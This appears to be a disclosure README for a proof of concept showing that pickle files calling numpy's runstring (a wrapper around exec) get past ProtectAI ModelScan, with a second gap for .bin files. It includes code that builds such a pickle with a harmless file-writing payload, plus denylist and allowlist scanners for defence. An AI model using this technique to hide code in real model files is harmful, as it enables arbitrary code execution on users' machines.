ModelScan Bypass PoC

Summary

This repository demonstrates a bypass of ProtectAI ModelScan (v0.8.8). The included pickle files achieve arbitrary Python code execution during deserialization, while ModelScan reports no issues for them.

Details

numpy.testing._private.utils.runstring(astr, dict) is a thin wrapper around exec(astr, dict). It is NOT on ModelScan's denylist of dangerous globals, so a pickle whose REDUCE opcode calls it with a code string loads without any finding, even though the effect is identical to calling exec directly.

Files

  • poc_modelscan_bypass.pkl: Malicious pickle (538 bytes)
  • poc_modelscan_bypass.bin: Same payload with .bin extension (PyTorch naming)

Reproduction

Install ModelScan (pip install modelscan) and scan the file with modelscan -p <file>: it reports no issues. Then load the file with pickle.load (or any loader that unpickles it): the embedded code runs during deserialization.
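As an added example (not code from this PoC repository), the following Python builds an equivalent runstring pickle by hand, so it runs without numpy installed, and scans it at the opcode level with pickletools without ever unpickling it. It contrasts a denylist check, which lets the runstring reference through, with an allowlist check, which flags it. The denylist and allowlist contents are illustrative assumptions for this example, not ModelScan's actual lists, and the benign OrderedDict pickle is constructed here as a control.

```python
"""Opcode-level pickle scan: denylist vs allowlist on a runstring pickle."""
import collections
import pickle
import pickletools


def build_runstring_pickle(code: str) -> bytes:
    """Constructed for this example: a minimal protocol-2 pickle that, when
    loaded, calls numpy.testing._private.utils.runstring(code, {}), i.e.
    exec(code, {}). Written as raw opcodes so numpy is not needed to build it.
    Never pickle.load() this; scan it only."""
    payload = code.encode("utf-8")
    return (
        b"\x80\x02"                                            # PROTO 2
        b"cnumpy.testing._private.utils\nrunstring\n"          # GLOBAL module name
        + b"X" + len(payload).to_bytes(4, "little") + payload  # BINUNICODE code
        + b"}"                                                 # EMPTY_DICT (globals)
        + b"\x86"                                              # TUPLE2 -> (code, {})
        + b"R"                                                 # REDUCE -> runstring(...)
        + b"."                                                 # STOP
    )


def benign_pickle() -> bytes:
    """Constructed control: a harmless state-dict-like object, pickled with the
    default protocol so the scanner's STACK_GLOBAL path is exercised."""
    return pickle.dumps(collections.OrderedDict([("weight", 1.0)]))


_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "BINSTRING", "SHORT_BINSTRING"}


def referenced_globals(data: bytes) -> list[str]:
    """Every 'module.name' the pickle imports via GLOBAL, INST or STACK_GLOBAL,
    found by walking opcodes, never by executing them. STACK_GLOBAL takes its
    two operands from the last two pushed strings; tracking pushed strings is
    enough for scanning but is not a full pickle VM."""
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)      # pickletools joins the pair with a space
            refs.append(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":
            name, module = strings.pop(), strings.pop()
            refs.append(f"{module}.{name}")
        elif op.name in _STRING_OPS:
            strings.append(arg)
    return refs


# Assumed illustrative denylist of top-level modules, in the spirit of a
# denylist-based scanner. Not ModelScan's real list.
DENYLIST_MODULES = {"os", "posix", "nt", "sys", "subprocess", "builtins",
                    "__builtin__", "runpy", "socket", "shutil"}


def denylist_findings(data: bytes) -> list[str]:
    """Flag a global only if its top-level module is on the denylist. Any
    exec-equivalent living elsewhere (here, under numpy.testing) slips through."""
    out = []
    for ref in referenced_globals(data):
        module = ref.rsplit(".", 1)[0]
        if module.split(".")[0] in DENYLIST_MODULES:
            out.append(ref)
    return out


# Assumed illustrative allowlist of globals a legitimate model file may
# reference; a real one is derived from the framework's own serialized files.
ALLOWLIST = {
    "collections.OrderedDict",
    "torch._utils._rebuild_tensor_v2",
    "torch.FloatStorage",
    "numpy.core.multiarray._reconstruct",
    "numpy.ndarray",
    "numpy.dtype",
}


def allowlist_findings(data: bytes) -> list[str]:
    """Flag every global that is not explicitly allowed. Unknown callables are
    findings by default, so a new exec wrapper cannot hide by being unlisted."""
    return [ref for ref in referenced_globals(data) if ref not in ALLOWLIST]


if __name__ == "__main__":
    mal = build_runstring_pickle("open('modelscan_bypass_proof.txt', 'w').write('proof')")
    print("globals:  ", referenced_globals(mal))
    print("denylist: ", denylist_findings(mal))   # [] : the bypass
    print("allowlist:", allowlist_findings(mal))  # runstring flagged
    print("control:  ", allowlist_findings(benign_pickle()))  # [] : no false positive
```

The denylist result is the bypass the PoC describes: the reference is found but not matched. The allowlist result is the check a loader-side control should make, and it costs nothing more than the same opcode walk.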

Impact

Any pickle-based model that routes code execution through numpy.testing._private.utils.runstring bypasses ModelScan's pickle scanning. The .bin variant also bypasses PyTorchUnsafeOpScan, because the file is not routed to that scanner under the .bin extension (a format routing gap).

Note

The included payload is deliberately harmless: it only creates a proof text file. The same technique can execute any Python code.
